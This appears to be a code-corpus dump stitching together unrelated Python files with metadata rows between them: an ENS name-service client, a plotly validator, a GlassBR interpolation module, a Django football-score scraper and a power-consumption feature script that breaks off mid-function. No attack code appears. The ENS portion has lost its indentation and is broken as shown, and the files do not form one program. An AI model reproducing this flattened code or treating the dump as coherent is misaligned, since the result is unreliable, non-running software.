is_valid_name,
label_to_hash,
normal_name_to_hash,
normalize_name,
raw_name_to_hash,
)
if TYPE_CHECKING:
from web3 import Web3 # noqa: F401
from web3.contract import ( # noqa: F401
Contract,
)
from web3.providers import ( # noqa: F401
BaseProvider,
)
from web3.types import ( # noqa: F401
TxParams,
)
class ENS:
"""
Quick access to common Ethereum Name Service functions,
like getting the address for a name.
Unless otherwise specified, all addresses are assumed to be a `str` in
    `checksum format <https://github.com/ethereum/EIPs/blob/master/EIPS/eip-55.md>`_,
like: ``"0x314159265dD8dbb310642f98f50C066173C1259b"``
"""
@staticmethod
@wraps(label_to_hash)
def labelhash(label: str) -> HexBytes:
return label_to_hash(label)
@staticmethod
@wraps(raw_name_to_hash)
def namehash(name: str) -> HexBytes:
return raw_name_to_hash(name)
@staticmethod
@wraps(normalize_name)
def nameprep(name: str) -> str:
return normalize_name(name)
@staticmethod
@wraps(is_valid_name)
def is_valid_name(name: str) -> bool:
return is_valid_name(name)
@staticmethod
@wraps(address_to_reverse_domain)
def reverse_domain(address: ChecksumAddress) -> str:
return address_to_reverse_domain(address)
def __init__(
self, provider: 'BaseProvider' = cast('BaseProvider', default), addr: ChecksumAddress = None
) -> None:
"""
:param provider: a single provider used to connect to Ethereum
:type provider: instance of `web3.providers.base.BaseProvider`
:param hex-string addr: the address of the ENS registry on-chain. If not provided,
ENS.py will default to the mainnet ENS registry address.
"""
self.web3 = init_web3(provider)
ens_addr = addr if addr else ENS_MAINNET_ADDR
self.ens = self.web3.eth.contract(abi=abis.ENS, address=ens_addr)
self._resolverContract = self.web3.eth.contract(abi=abis.RESOLVER)
@classmethod
def fromWeb3(cls, web3: 'Web3', addr: ChecksumAddress = None) -> 'ENS':
"""
Generate an ENS instance with web3
:param `web3.Web3` web3: to infer connection information
:param hex-string addr: the address of the ENS registry on-chain. If not provided,
ENS.py will default to the mainnet ENS registry address.
"""
return cls(web3.manager.provider, addr=addr)
def address(self, name: str) -> Optional[ChecksumAddress]:
"""
Look up the Ethereum address that `name` currently points to.
:param str name: an ENS name to look up
:raises InvalidName: if `name` has invalid syntax
"""
return cast(ChecksumAddress, self.resolve(name, 'addr'))
def name(self, address: ChecksumAddress) -> Optional[str]:
"""
Look up the name that the address points to, using a
reverse lookup. Reverse lookup is opt-in for name owners.
:param address:
:type address: hex-string
"""
reversed_domain = address_to_reverse_domain(address)
return self.resolve(reversed_domain, get='name')
@dict_copy
def setup_address(
self,
name: str,
address: Union[Address, ChecksumAddress, HexAddress] = cast(ChecksumAddress, default),
transact: "TxParams" = {}
) -> HexBytes:
"""
Set up the name to point to the supplied address.
The sender of the transaction must own the name, or
its parent name.
Example: If the caller owns ``parentname.eth`` with no subdomains
and calls this method with ``sub.parentname.eth``,
then ``sub`` will be created as part of this call.
:param str name: ENS name to set up
:param str address: name will point to this address, in checksum format. If ``None``,
erase the record. If not specified, name will point to the owner's address.
:param dict transact: the transaction configuration, like in
:meth:`~web3.eth.Eth.send_transaction`
:raises InvalidName: if ``name`` has invalid syntax
:raises UnauthorizedError: if ``'from'`` in `transact` does not own `name`
"""
owner = self.setup_owner(name, transact=transact)
self._assert_control(owner, name)
if is_none_or_zero_address(address):
address = None
elif address is default:
address = owner
elif is_binary_address(address):
address = to_checksum_address(cast(str, address))
elif not is_checksum_address(address):
raise ValueError("You must supply the address in checksum format")
if self.address(name) == address:
return None
if address is None:
address = EMPTY_ADDR_HEX
transact['from'] = owner
resolver: 'Contract' = self._set_resolver(name, transact=transact)
return resolver.functions.setAddr(raw_name_to_hash(name), address).transact(transact)
@dict_copy
def setup_name(
self, name: str, address: ChecksumAddress = None, transact: "TxParams" = {}
) -> HexBytes:
"""
Set up the address for reverse lookup, aka "caller ID".
After successful setup, the method :meth:`~ens.main.ENS.name` will return
`name` when supplied with `address`.
:param str name: ENS name that address will point to
:param str address: to set up, in checksum format
:param dict transact: the transaction configuration, like in
:meth:`~web3.eth.send_transaction`
:raises AddressMismatch: if the name does not already point to the address
:raises InvalidName: if `name` has invalid syntax
:raises UnauthorizedError: if ``'from'`` in `transact` does not own `name`
:raises UnownedName: if no one owns `name`
"""
if not name:
self._assert_control(address, 'the reverse record')
return self._setup_reverse(None, address, transact=transact)
else:
resolved = self.address(name)
if is_none_or_zero_address(address):
address = resolved
elif resolved and address != resolved and resolved != EMPTY_ADDR_HEX:
raise AddressMismatch(
"Could not set address %r to point to name, because the name resolves to %r. "
"To change the name for an existing address, call setup_address() first." % (
address, resolved
)
)
if is_none_or_zero_address(address):
address = self.owner(name)
if is_none_or_zero_address(address):
raise UnownedName("claim subdomain using setup_address() first")
if is_binary_address(address):
address = to_checksum_address(address)
if not is_checksum_address(address):
raise ValueError("You must supply the address in checksum format")
self._assert_control(address, name)
if not resolved:
self.setup_address(name, address, transact=transact)
return self._setup_reverse(name, address, transact=transact)
def resolve(self, name: str, get: str = 'addr') -> Optional[Union[ChecksumAddress, str]]:
normal_name = normalize_name(name)
resolver = self.resolver(normal_name)
if resolver:
lookup_function = getattr(resolver.functions, get)
namehash = normal_name_to_hash(normal_name)
address = lookup_function(namehash).call()
if is_none_or_zero_address(address):
return None
            return address
else:
return None
def resolver(self, normal_name: str) -> Optional['Contract']:
resolver_addr = self.ens.caller.resolver(normal_name_to_hash(normal_name))
if is_none_or_zero_address(resolver_addr):
return None
return self._resolverContract(address=resolver_addr)
def reverser(self, target_address: ChecksumAddress) -> Optional['Contract']:
reversed_domain = address_to_reverse_domain(target_address)
return self.resolver(reversed_domain)
def owner(self, name: str) -> ChecksumAddress:
"""
Get the owner of a name. Note that this may be different from the
deed holder in the '.eth' registrar. Learn more about the difference
between deed and name ownership in the ENS `Managing Ownership docs
<http://docs.ens.domains/en/latest/userguide.html#managing-ownership>`_
:param str name: ENS name to look up
:return: owner address
:rtype: str
"""
node = raw_name_to_hash(name)
return self.ens.caller.owner(node)
@dict_copy
def setup_owner(
self,
name: str,
new_owner: ChecksumAddress = cast(ChecksumAddress, default),
transact: "TxParams" = {}
) -> ChecksumAddress:
"""
Set the owner of the supplied name to `new_owner`.
For typical scenarios, you'll never need to call this method directly,
simply call :meth:`setup_name` or :meth:`setup_address`. This method does *not*
set up the name to point to an address.
If `new_owner` is not supplied, then this will assume you
want the same owner as the parent domain.
If the caller owns ``parentname.eth`` with no subdomains
and calls this method with ``sub.parentname.eth``,
then ``sub`` will be created as part of this call.
:param str name: ENS name to set up
:param new_owner: account that will own `name`. If ``None``, set owner to empty addr.
If not specified, name will point to the parent domain owner's address.
:param dict transact: the transaction configuration, like in
:meth:`~web3.eth.Eth.send_transaction`
:raises InvalidName: if `name` has invalid syntax
:raises UnauthorizedError: if ``'from'`` in `transact` does not own `name`
:returns: the new owner's address
"""
(super_owner, unowned, owned) = self._first_owner(name)
if new_owner is default:
new_owner = super_owner
elif not new_owner:
new_owner = ChecksumAddress(EMPTY_ADDR_HEX)
else:
new_owner = to_checksum_address(new_owner)
current_owner = self.owner(name)
if new_owner == EMPTY_ADDR_HEX and not current_owner:
return None
elif current_owner == new_owner:
return current_owner
else:
self._assert_control(super_owner, name, owned)
self._claim_ownership(new_owner, unowned, owned, super_owner, transact=transact)
return new_owner
def _assert_control(self, account: ChecksumAddress, name: str,
parent_owned: Optional[str] = None) -> None:
if not address_in(account, self.web3.eth.accounts):
raise UnauthorizedError(
"in order to modify %r, you must control account %r, which owns %r" % (
name, account, parent_owned or name
)
)
def _first_owner(self, name: str) -> Tuple[Optional[ChecksumAddress], Sequence[str], str]:
"""
Takes a name, and returns the owner of the deepest subdomain that has an owner
:returns: (owner or None, list(unowned_subdomain_labels), first_owned_domain)
"""
owner = None
unowned = []
pieces = normalize_name(name).split('.')
while pieces and is_none_or_zero_address(owner):
name = '.'.join(pieces)
owner = self.owner(name)
if is_none_or_zero_address(owner):
unowned.append(pieces.pop(0))
return (owner, unowned, name)
@dict_copy
def _claim_ownership(
self,
owner: ChecksumAddress,
unowned: Sequence[str],
owned: str,
old_owner: ChecksumAddress = None,
transact: "TxParams" = {}
) -> None:
transact['from'] = old_owner or owner
for label in reversed(unowned):
self.ens.functions.setSubnodeOwner(
raw_name_to_hash(owned),
label_to_hash(label),
owner
).transact(transact)
owned = "%s.%s" % (label, owned)
@dict_copy
def _set_resolver(
self, name: str, resolver_addr: ChecksumAddress = None, transact: "TxParams" = {}
) -> 'Contract':
if is_none_or_zero_address(resolver_addr):
resolver_addr = self.address('resolver.eth')
namehash = raw_name_to_hash(name)
if self.ens.caller.resolver(namehash) != resolver_addr:
self.ens.functions.setResolver(
namehash,
resolver_addr
).transact(transact)
return self._resolverContract(address=resolver_addr)
@dict_copy
def _setup_reverse(
self, name: str, address: ChecksumAddress, transact: "TxParams" = {}
) -> HexBytes:
if name:
name = normalize_name(name)
else:
name = ''
transact['from'] = address
return self._reverse_registrar().functions.setName(name).transact(transact)
def _reverse_registrar(self) -> 'Contract':
addr = self.ens.caller.owner(normal_name_to_hash(REVERSE_REGISTRAR_DOMAIN))
return self.web3.eth.contract(address=addr, abi=abis.REVERSE_REGISTRAR)
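# --- Hedged usage sketch (added illustration, not part of the original module) ---
# Assumes a reachable Ethereum JSON-RPC node; the endpoint URL and the ENS name
# below are placeholders rather than values taken from this file.
def _ens_usage_sketch() -> None:
    from web3 import Web3  # local import to keep the sketch self-contained
    w3 = Web3(Web3.HTTPProvider("http://127.0.0.1:8545"))
    ns = ENS.fromWeb3(w3)
    address = ns.address("example.eth")   # forward lookup: name -> address
    if address is not None:
        print(ns.name(address))           # reverse lookup: address -> name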
| 37.064433
| 100
| 0.630346
|
9a319683472467779aad97a3b6410849b862bc8a
| 440
|
py
|
Python
|
packages/python/plotly/plotly/validators/histogram2d/colorbar/_bordercolor.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/histogram2d/colorbar/_bordercolor.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/histogram2d/colorbar/_bordercolor.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="histogram2d.colorbar", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
**kwargs,
)
| 31.428571
| 85
| 0.670455
|
dd40a79298db328cccabd0cff23824aa2bf0ae0c
| 9,327
|
py
|
Python
|
code/stable/glassbr/src/python/Interpolation.py
|
Danki567/Drasil
|
d6bd7d0564710ae70b4847301d3d4df3f83fba11
|
[
"BSD-2-Clause"
] | 2
|
2021-06-24T15:39:55.000Z
|
2021-06-24T16:57:00.000Z
|
code/stable/glassbr/src/python/Interpolation.py
|
Danki567/Drasil
|
d6bd7d0564710ae70b4847301d3d4df3f83fba11
|
[
"BSD-2-Clause"
] | null | null | null |
code/stable/glassbr/src/python/Interpolation.py
|
Danki567/Drasil
|
d6bd7d0564710ae70b4847301d3d4df3f83fba11
|
[
"BSD-2-Clause"
] | null | null | null |
## \file Interpolation.py
# \author Nikitha Krithnan and W. Spencer Smith
# \brief Provides functions for linear interpolation on three-dimensional data
import ReadTable
## \brief Performs linear interpolation
# \param x_1 lower x-coordinate
# \param y_1 lower y-coordinate
# \param x_2 upper x-coordinate
# \param y_2 upper y-coordinate
# \param x x-coordinate to interpolate at
# \return y value interpolated at given x value
def func_lin_interp(x_1, y_1, x_2, y_2, x):
outfile = open("log.txt", "a")
print("function func_lin_interp called with inputs: {", file=outfile)
print(" x_1 = ", end='', file=outfile)
print(x_1, end='', file=outfile)
print(", ", file=outfile)
print(" y_1 = ", end='', file=outfile)
print(y_1, end='', file=outfile)
print(", ", file=outfile)
print(" x_2 = ", end='', file=outfile)
print(x_2, end='', file=outfile)
print(", ", file=outfile)
print(" y_2 = ", end='', file=outfile)
print(y_2, end='', file=outfile)
print(", ", file=outfile)
print(" x = ", end='', file=outfile)
print(x, file=outfile)
print(" }", file=outfile)
outfile.close()
return (y_2 - y_1) / (x_2 - x_1) * (x - x_1) + y_1
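# Worked example (added illustration with made-up values): with
# (x_1, y_1) = (0.0, 0.0) and (x_2, y_2) = (10.0, 20.0), interpolating at
# x = 2.5 gives (20.0 - 0.0) / (10.0 - 0.0) * (2.5 - 0.0) + 0.0 = 5.0, so
# func_lin_interp(0.0, 0.0, 10.0, 20.0, 2.5) returns 5.0 (and, as a side
# effect, appends the call parameters to log.txt).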
## \brief Finds the array index for a value closest to the given value
# \param arr array in which value should be found
# \param v value whose index will be found
# \return index of given value in given array
def func_find(arr, v):
outfile = open("log.txt", "a")
print("function func_find called with inputs: {", file=outfile)
print(" arr = ", end='', file=outfile)
print(arr, end='', file=outfile)
print(", ", file=outfile)
print(" v = ", end='', file=outfile)
print(v, file=outfile)
print(" }", file=outfile)
outfile.close()
for i in range(0, len(arr) - 1, 1):
if (arr[i] <= v and v <= arr[i + 1]) :
return i
raise Exception("Bound error")
## \brief Extracts a column from a 2D matrix
# \param mat matrix from which column will be extracted
# \param j index
# \return column of the given matrix at the given index
def func_extractColumn(mat, j):
outfile = open("log.txt", "a")
print("function func_extractColumn called with inputs: {", file=outfile)
print(" mat = ", end='', file=outfile)
print(mat, end='', file=outfile)
print(", ", file=outfile)
print(" j = ", end='', file=outfile)
print(j, file=outfile)
print(" }", file=outfile)
outfile.close()
col = []
for i in range(0, len(mat), 1):
col.append(mat[i][j])
return col
## \brief Linearly interpolates a y value at given x and z values
# \param filename name of file with x y and z data
# \param x x-coordinate to interpolate at
# \param z z-coordinate to interpolate at
# \return y value interpolated at given x and z values
def func_interpY(filename, x, z):
outfile = open("log.txt", "a")
print("function func_interpY called with inputs: {", file=outfile)
print(" filename = ", end='', file=outfile)
print(filename, end='', file=outfile)
print(", ", file=outfile)
print(" x = ", end='', file=outfile)
print(x, end='', file=outfile)
print(", ", file=outfile)
print(" z = ", end='', file=outfile)
print(z, file=outfile)
print(" }", file=outfile)
outfile.close()
x_matrix = []
y_matrix = []
z_vector = []
ReadTable.func_read_table(filename, z_vector, x_matrix, y_matrix)
i = func_find(z_vector, z)
outfile = open("log.txt", "a")
print("var 'i' assigned to ", end='', file=outfile)
print(i, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
x_z_1 = func_extractColumn(x_matrix, i)
outfile = open("log.txt", "a")
print("var 'x_z_1' assigned to ", end='', file=outfile)
print(x_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_1 = func_extractColumn(y_matrix, i)
outfile = open("log.txt", "a")
print("var 'y_z_1' assigned to ", end='', file=outfile)
print(y_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
x_z_2 = func_extractColumn(x_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'x_z_2' assigned to ", end='', file=outfile)
print(x_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_2 = func_extractColumn(y_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'y_z_2' assigned to ", end='', file=outfile)
print(y_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
try :
j = func_find(x_z_1, x)
outfile = open("log.txt", "a")
print("var 'j' assigned to ", end='', file=outfile)
print(j, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
k_2 = func_find(x_z_2, x)
outfile = open("log.txt", "a")
print("var 'k_2' assigned to ", end='', file=outfile)
print(k_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
except Exception :
raise Exception("Interpolation of y failed")
y_1 = func_lin_interp(x_z_1[j], y_z_1[j], x_z_1[j + 1], y_z_1[j + 1], x)
outfile = open("log.txt", "a")
print("var 'y_1' assigned to ", end='', file=outfile)
print(y_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_2 = func_lin_interp(x_z_2[k_2], y_z_2[k_2], x_z_2[k_2 + 1], y_z_2[k_2 + 1], x)
outfile = open("log.txt", "a")
print("var 'y_2' assigned to ", end='', file=outfile)
print(y_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
return func_lin_interp(z_vector[i], y_1, z_vector[i + 1], y_2, z)
## \brief Linearly interpolates a z value at given x and y values
# \param filename name of file with x y and z data
# \param x x-coordinate to interpolate at
# \param y y-coordinate to interpolate at
# \return z value interpolated at given x and y values
def func_interpZ(filename, x, y):
outfile = open("log.txt", "a")
print("function func_interpZ called with inputs: {", file=outfile)
print(" filename = ", end='', file=outfile)
print(filename, end='', file=outfile)
print(", ", file=outfile)
print(" x = ", end='', file=outfile)
print(x, end='', file=outfile)
print(", ", file=outfile)
print(" y = ", end='', file=outfile)
print(y, file=outfile)
print(" }", file=outfile)
outfile.close()
x_matrix = []
y_matrix = []
z_vector = []
ReadTable.func_read_table(filename, z_vector, x_matrix, y_matrix)
for i in range(0, len(z_vector) - 1, 1):
x_z_1 = func_extractColumn(x_matrix, i)
outfile = open("log.txt", "a")
print("var 'x_z_1' assigned to ", end='', file=outfile)
print(x_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_1 = func_extractColumn(y_matrix, i)
outfile = open("log.txt", "a")
print("var 'y_z_1' assigned to ", end='', file=outfile)
print(y_z_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
x_z_2 = func_extractColumn(x_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'x_z_2' assigned to ", end='', file=outfile)
print(x_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_z_2 = func_extractColumn(y_matrix, i + 1)
outfile = open("log.txt", "a")
print("var 'y_z_2' assigned to ", end='', file=outfile)
print(y_z_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
try :
j = func_find(x_z_1, x)
outfile = open("log.txt", "a")
print("var 'j' assigned to ", end='', file=outfile)
print(j, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
k_2 = func_find(x_z_2, x)
outfile = open("log.txt", "a")
print("var 'k_2' assigned to ", end='', file=outfile)
print(k_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
except Exception :
continue
y_1 = func_lin_interp(x_z_1[j], y_z_1[j], x_z_1[j + 1], y_z_1[j + 1], x)
outfile = open("log.txt", "a")
print("var 'y_1' assigned to ", end='', file=outfile)
print(y_1, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
y_2 = func_lin_interp(x_z_2[k_2], y_z_2[k_2], x_z_2[k_2 + 1], y_z_2[k_2 + 1], x)
outfile = open("log.txt", "a")
print("var 'y_2' assigned to ", end='', file=outfile)
print(y_2, end='', file=outfile)
print(" in module Interpolation", file=outfile)
outfile.close()
if (y_1 <= y and y <= y_2) :
return func_lin_interp(y_1, z_vector[i], y_2, z_vector[i + 1], y)
raise Exception("Interpolation of z failed")
| 39.689362
| 88
| 0.604803
|
b0f8ba0dff5eebe7506a4bd4803fa885aeca1a46
| 6,509
|
py
|
Python
|
crawler.py
|
AlisonJonantan/crawlerlivescore
|
96ba6213c2eea3aa91d794eb6e5c2f650e1364ac
|
[
"Apache-2.0"
] | 5
|
2018-08-08T20:38:57.000Z
|
2022-02-01T15:21:58.000Z
|
crawler.py
|
Maarcosv99/crawlerlivescore
|
96ba6213c2eea3aa91d794eb6e5c2f650e1364ac
|
[
"Apache-2.0"
] | null | null | null |
crawler.py
|
Maarcosv99/crawlerlivescore
|
96ba6213c2eea3aa91d794eb6e5c2f650e1364ac
|
[
"Apache-2.0"
] | 5
|
2018-08-01T17:58:28.000Z
|
2022-02-11T03:35:09.000Z
|
import requests
from bs4 import BeautifulSoup
from administracao.models import Analise, Prognostico
from core.models import JogoAnaliseAoVivo, JogoAoVivo
# CRAWLER DO PLACAR DE FUTEBOL
def autenticacaoPlacar():
url = 'https://www.placardefutebol.com.br/jogos-de-hoje'
proxies = {'http': '107.170.42.158:80'}
r = requests.get(url)
soup = BeautifulSoup(r.text, 'lxml')
return soup
def jogos():
soup = autenticacaoPlacar()
url = 'https://www.placardefutebol.com.br'
campeonatos = soup.find('div', {'id': 'livescore'}).find_all('div', {'class': 'container content'})
todos_jogos = []
for campeonato in campeonatos:
jogos = campeonato.find_all('a')
for jogo in jogos:
jogo = dados_jogo(jogo)
if not 'erro' in jogo:
if jogo['time_casa'] and jogo['time_fora']:
if jogo['status']:
index = str(jogo['status'])
if jogo['status'] == 'AO VIVO' or index.find('MIN') > 0:
todos_jogos.append(jogo)
return todos_jogos
def dados_jogo(jogo):
url = 'https://www.placardefutebol.com.br'
jogo_link = '{0}{1}'.format(url, jogo['href'])
erro = False
try:
jogo_status = jogo.find('span', {'class': 'status-name'}).string
except AttributeError:
erro = True
if erro:
return ({'erro': erro})
jogo_time_casa = jogo.find('h5', {'class': 'text-right team_link'}).string
try:
        jogo_time_casa_gols = jogo.find(class_='match-score').find(class_='badge').string
print('Time casa gols:' + jogo_time_casa_gols)
except AttributeError:
jogo_time_casa_gols = '0'
jogo_time_fora = jogo.find('h5', {'class': 'text-left team_link'}).string
try:
jogo_time_fora_gols = jogo.find_all(class_='match-score')[1].find(class_='badge').string
print('Time fora gols:' + jogo_time_fora_gols)
except AttributeError:
jogo_time_fora_gols = '0'
return {'link': jogo_link, 'status': jogo_status, 'time_casa': jogo_time_casa, 'time_casa_gol': jogo_time_casa_gols,
'time_fora': jogo_time_fora, 'time_fora_gol': jogo_time_fora_gols}
def procurar_jogo(todos_jogos, time_casa, time_fora):
for jogo in todos_jogos:
if jogo['time_casa'].find(time_casa) >= 0 and jogo['time_fora'].find(time_fora) >= 0:
return jogo
return False
def status_gol(jogo):
link = jogo['link']
r = requests.get(link)
soup = BeautifulSoup(r.text, 'lxml')
eventos_casa = soup.find_all('div', {'class': 'match-card-events-home-team'})
eventos_fora = soup.find_all('div', {'class': 'match-card-events-away-team'})
gols_casa_ft = 0
gols_casa_ht = 0
for evento_casa in eventos_casa:
try:
gols_casa = evento_casa.find_all('i', {'class': 'fa fa-futbol-o'})
for gol_casa in gols_casa:
gols_casa_ft += 1
tempo_do_gol = gol_casa.next_sibling
tempo_do_gol = int(tempo_do_gol.replace(" - ", "").replace("'", ""))
if tempo_do_gol <= 45:
gols_casa_ht += 1
except:
gols_casa = 0
gols_fora_ft = 0
gols_fora_ht = 0
for evento_fora in eventos_fora:
try:
gols_fora = evento_fora.find_all('i', {'class': 'fa fa-futbol-o'})
for gol_fora in gols_fora:
gols_fora_ft += 1
                tempo_do_gol = gol_fora.previous_sibling
                # keep every digit of the minute (the original int(tempo_do_gol[:1])
                # dropped all digits after the first); the markup is assumed to
                # mirror the home-team events
                tempo_do_gol = int(''.join(c for c in str(tempo_do_gol) if c.isdigit()))
if tempo_do_gol <= 45:
gols_fora_ht += 1
except:
gols_fora = 0
return {'CasaHT': gols_casa_ht, 'CasaFT': gols_casa_ft, 'ForaHT': gols_fora_ht, 'ForaFT': gols_fora_ft}
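# --- Hedged usage sketch (added illustration, not part of the original module) ---
# Combines jogos(), procurar_jogo() and status_gol(); the team names below are
# placeholders only.
def _exemplo_uso_crawler():
    todos = jogos()
    jogo = procurar_jogo(todos, 'Time Casa', 'Time Fora')
    if jogo:
        placar = status_gol(jogo)
        # e.g. {'CasaHT': 1, 'CasaFT': 2, 'ForaHT': 0, 'ForaFT': 1}
        print(placar)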
def jogoAnaliseAoVivo(todos_jogos):
ultimaAnalise = Analise.objects.order_by('id').last()
prognosticos = Prognostico.objects.all().filter(analise=ultimaAnalise).order_by('-id')
tamanho_lista = len(prognosticos)
index = 0
for jogo in prognosticos:
index += 1
response = procurar_jogo(todos_jogos, jogo.time_casa, jogo.time_fora)
if response:
if type(response) is dict:
                # QuerySet.last() returns None (it does not raise) when there is
                # no existing record, so check for None instead of try/except
                instancia = JogoAnaliseAoVivo.objects.order_by('id').last()
                if instancia is None:
                    instancia = JogoAnaliseAoVivo(
                        time_casa=response['time_casa'],
                        time_casa_gol=response['time_casa_gol'],
                        time_fora=response['time_fora'],
                        time_fora_gol=response['time_fora_gol'],
                        tip=jogo.entrada)
                    instancia.save()
                    return True
                instancia.time_casa = response['time_casa']
                instancia.time_casa_gol = response['time_casa_gol']
                instancia.time_fora = response['time_fora']
                instancia.time_fora_gol = response['time_fora_gol']
                instancia.tip = jogo.entrada
                instancia.save()
                return True
elif index == (tamanho_lista - 1):
                instancia = JogoAnaliseAoVivo.objects.order_by('id').last()
                if instancia is None:
                    return True
instancia.time_casa = None
instancia.time_casa_gol = None
instancia.time_fora = None
instancia.time_fora_gol = None
instancia.tip = None
instancia.save()
return True
def jogoAoVivo(todos_jogos):
    # guard against an empty list before indexing it
    if not todos_jogos:
        instancia = JogoAoVivo.objects.order_by('id').last()
        if instancia is None:
            return True
        instancia.time_casa = None
        instancia.time_casa_gol = None
        instancia.time_fora = None
        instancia.time_fora_gol = None
        instancia.save()
        return True
    else:
        jogo = todos_jogos[0]
        # QuerySet.last() returns None (it does not raise) when the table is
        # empty, so check for None instead of relying on try/except
        instancia = JogoAoVivo.objects.order_by('id').last()
        if instancia is None:
            instancia = JogoAoVivo(
                time_casa=jogo['time_casa'],
                time_casa_gol=jogo['time_casa_gol'],
                time_fora=jogo['time_fora'],
                time_fora_gol=jogo['time_fora_gol'])
            instancia.save()
            return True
        instancia.time_casa = jogo['time_casa']
        instancia.time_casa_gol = jogo['time_casa_gol']
        instancia.time_fora = jogo['time_fora']
        instancia.time_fora_gol = jogo['time_fora_gol']
        instancia.save()
        return True
| 36.161111
| 120
| 0.584268
|
eae8f927d0fdb4a9d3b14261b008b52ad0300f41
| 4,794
|
py
|
Python
|
code/make_features.py
|
lvniqi/tianchi_power
|
4e2e5bb979dc068f4d37341ec43b8993ff71cd12
|
[
"MIT"
] | 13
|
2017-08-18T02:15:05.000Z
|
2019-11-06T12:57:31.000Z
|
code/make_features.py
|
lvniqi/tianchi_power
|
4e2e5bb979dc068f4d37341ec43b8993ff71cd12
|
[
"MIT"
] | null | null | null |
code/make_features.py
|
lvniqi/tianchi_power
|
4e2e5bb979dc068f4d37341ec43b8993ff71cd12
|
[
"MIT"
] | 11
|
2017-08-09T08:08:00.000Z
|
2019-11-06T12:57:35.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 18 19:17:04 2017
@author: boweiy
"""
import pandas as pd
import numpy as np
from multiprocessing import Pool as m_Pool
from preprocess import get_dataset,get_user_id_list,increase_index
from preprocess import save_month_df,save_history_df
from preprocess import check_empty,filter_user_id
def make_features(user_id,user_df):
"""
    Construct single-day features (lagged daily power consumption).
"""
print 'user_id:', user_id
power = user_df.power_consumption
assert power.index[0] == user_df.index[0]
assert len(user_df.index) == 639
new_df = pd.DataFrame(index=user_df.index.union(pd.date_range('2016-9-1','2016-9-30')))
pw_new = power.copy()
#predict 30 days and 30days for features
for d in range(60):
pw_new.index += pd.Timedelta('1D')
new_df['power#-%d'%(d+1)] = pw_new
#create 30 models
for d in range(30):
#30 days features
x_ = new_df[new_df.columns[d:30+d]]
x_['y'] = power
x_.to_csv('./features/day_model/%d/%d.csv'%(d+1,user_id))
#return x_
def make_month_features(user_id,user_df):
"""
    Construct features for the monthly model: 30 lagged daily loads plus targets y#0..y#30.
"""
print 'user_id:', user_id
power = user_df.power_consumption.copy()
assert power.index[0] == user_df.index[0]
new_df = pd.DataFrame(index=user_df.index.union(pd.date_range('2016-10-1','2016-10-31')))
pw_new = power.copy()
#predict 30 days and 30days for features
for d in range(30):
pw_new.index += pd.Timedelta('1D')
new_df['power#-%d'%(d+1)] = pw_new
#create 30 models
for d in range(31):
#30 days features
new_df['y#%d'%d] = power
power.index -= pd.Timedelta('1D')
save_month_df(new_df,user_id)
return new_df
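# Note on the frame built above (added explanation, same semantics): for a row
# indexed at date t, column 'power#-d' holds the (log-transformed) load observed
# d days before t, while 'y#d' holds the load observed d days after t, so each
# row pairs up to 30 lagged loads with the 31 forward targets of the monthly models.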
def make_month_features_all():
pw_df_list = []
dataset = get_dataset()
dataset.power_consumption = dataset.power_consumption.apply(np.log)
for user_id in get_user_id_list():
print user_id
if not check_empty(user_id):
user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(0)
#add to list
pw_df_list.append((user_id,user_df))
#make_features(user_id,user_df)
p = m_Pool(64)
for arg in pw_df_list:
#p.apply_async(make_features,args=(arg))
p.apply_async(make_month_features,args=(arg))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
def history_feature(user_df):
user_pow_last_year = user_df.ix[user_df.index <'2016-1-1']
user_pow_last_year = increase_index(user_pow_last_year)
#weekly average
weekly_roll = user_pow_last_year.rolling(7,center=True)
weekly_median = weekly_roll.median()
weekly_max = weekly_roll.max()
weekly_min = weekly_roll.min()
#weekly2 average
weekly2_roll = user_pow_last_year.rolling(14,center=True)
weekly2_median = weekly2_roll.median()
#monthly average
monthly_roll = user_pow_last_year.rolling(30,center=True)
monthly_median = monthly_roll.median()
feature_index = user_pow_last_year.index[user_pow_last_year.index<'2016-10-30']
feature_df = pd.DataFrame(index = feature_index)
feature_df['weekly_median'] = weekly_median
feature_df['weekly_max'] = weekly_max
feature_df['weekly_min'] = weekly_min
feature_df['weekly2_median'] = weekly2_median
feature_df['monthly_median'] = monthly_median
feature_df = feature_df.dropna()
feature_df = feature_df.apply(np.log)
return feature_df
def make_history_month_features(user_id,user_df):
"""
    Construct historical monthly features from the previous year's rolling statistics.
"""
print 'user_id:', user_id
power = user_df.power_consumption.copy()
feature_df = history_feature(power)
